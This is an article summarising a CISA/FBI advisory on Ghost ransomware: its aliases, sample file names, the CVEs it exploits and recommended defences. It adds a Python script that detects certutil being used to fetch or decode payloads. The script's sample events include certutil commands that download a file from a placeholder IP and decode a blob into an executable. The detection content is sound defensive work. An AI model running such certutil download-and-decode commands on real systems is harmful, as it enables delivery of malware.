The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have issued a joint advisory warning that attackers using Ghost ransomware have breached organizations in more than 70 countries, including critical infrastructure organizations.
Industries Impacted by the Ghost Ransomware Breach
The Ghost ransomware campaign has affected many industries, including healthcare, government, education, technology, and manufacturing. Numerous small and medium-sized businesses were also targeted.
Ghost Ransomware Tactics and Techniques
The advisory states that Ghost ransomware actors began their attacks in early 2021, targeting organizations running outdated software and firmware. This indiscriminate targeting led to compromises in more than 70 countries, including organizations in China.
The Ghost ransomware group frequently changes its tactics: it rotates malware executables, changes the file extensions applied to encrypted files, alters ransom note content, and uses multiple email addresses for ransom communications. This has made the group difficult to track.
Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Ransomware samples used include Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.
This financially motivated group uses publicly available code to exploit vulnerabilities in servers, targeting unpatched flaws in Fortinet (CVE-2018-13379), ColdFusion (CVE-2010-2861, CVE-2009-3960), and Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
Defending Against Ghost Ransomware Attacks
To protect against Ghost ransomware, CISA and FBI recommend these steps:
Regular Backups: Create regular and off-site backups. These should be protected from encryption.
Patching: Patch operating systems, software, and firmware immediately.
Focus on Flaws: Address security flaws targeted by Ghost ransomware (CVEs listed above).
Network Segmentation: Segment networks to limit the spread of infections.
MFA: Enforce phishing-resistant multi-factor authentication (MFA) for all privileged accounts and email services.
Initial Access and Further Actions
Since early 2021, Ghost ransomware operators have used custom Mimikatz samples and CobaltStrike beacons, and have deployed ransomware payloads using Windows CertUtil, which allowed them to bypass security software.
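The advisory's mention of CertUtil being used to deploy payloads, together with the sample executable names listed earlier (Cring.exe, Ghost.exe, ElysiumO.exe, Locker.exe), lends itself to a simple process-creation detection. The following script is an added example written for this article, not code from the advisory or from CISA/FBI: it flags certutil.exe invoked with its URL-fetch or decode switches (a common living-off-the-land pattern) and any process whose image name matches one of the advisory's sample names. The event records, hostnames, paths and the 203.0.113.10 address are constructed for illustration and are not indicators from the advisory.

```python
"""Flag process-creation events that match behaviours named in the
CISA/FBI Ghost ransomware advisory: CertUtil used to fetch or decode
payloads, and executables carrying the advisory's sample file names.

All sample events below are constructed for illustration; they are not
indicators of compromise taken from the advisory.
"""

import ntpath
import shlex

# Executable names the advisory lists as Ghost ransomware samples.
ADVISORY_SAMPLE_NAMES = {"cring.exe", "ghost.exe", "elysiumo.exe", "locker.exe"}

# certutil switches that fetch content from a URL or decode an encoded blob.
# Routine certificate management on workstations rarely needs either.
CERTUTIL_SUSPECT_SWITCHES = {
    "-urlcache": "certutil_download",
    "-decode": "certutil_decode",
}

# Constructed sample events (hypothetical hosts, paths and TEST-NET address).
SAMPLE_EVENTS = [
    # certutil pulling a file from a URL into a world-writable directory
    {"host": "ws01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r'certutil.exe -urlcache -split -f "http://203.0.113.10/update.bin" C:\Users\Public\update.bin'},
    # certutil decoding a base64 blob into an executable
    {"host": "ws01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -decode C:\Users\Public\blob.txt C:\Users\Public\blob.exe"},
    # benign certutil use: verifying a certificate file
    {"host": "srv02", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -verify C:\certs\corp-root.cer"},
    # executable named like one of the advisory's samples
    {"host": "srv02", "image": r"C:\Users\Public\Locker.exe",
     "cmdline": r"C:\Users\Public\Locker.exe"},
    # ordinary process that should not be flagged
    {"host": "ws03", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'},
]


def _basename(path):
    # ntpath handles Windows-style paths regardless of the analysis host OS.
    return ntpath.basename(path).lower()


def _tokens(cmdline):
    # posix=False keeps backslashes literal; quotes are stripped afterwards.
    try:
        return [t.strip('"').lower() for t in shlex.split(cmdline, posix=False)]
    except ValueError:
        # Unbalanced quotes: fall back to a plain whitespace split.
        return cmdline.lower().split()


def analyze_event(event):
    """Return the list of rule names an event triggers (empty when clean)."""
    hits = []
    image = _basename(event["image"])
    tokens = _tokens(event["cmdline"])
    if image == "certutil.exe":
        for switch, rule in CERTUTIL_SUSPECT_SWITCHES.items():
            if switch in tokens:
                hits.append(rule)
    if image in ADVISORY_SAMPLE_NAMES:
        hits.append("advisory_sample_name")
    return hits


def scan_events(events):
    """Run every event through analyze_event and collect the findings."""
    findings = []
    for ev in events:
        rules = analyze_event(ev)
        if rules:
            findings.append({"host": ev["host"], "image": ev["image"], "rules": rules})
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['image']} -> {', '.join(f['rules'])}")
```

The file-name rule is deliberately the weaker of the two: because the group rotates executables, a match on a known sample name is a useful quick win but a miss proves nothing, whereas CertUtil fetching or decoding content is behaviour worth reviewing whatever the payload is called.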
The CVE-2018-13379 vulnerability was also exploited by state-sponsored groups, which scanned for vulnerable Fortinet SSL VPN appliances. The same vulnerability was used to breach US election support systems, and Fortinet has warned customers multiple times to patch it.
The joint advisory includes indicators of compromise (IOCs), tactics, techniques, and procedures (TTPs), and detection methods identified in FBI investigations as recently as January 2025.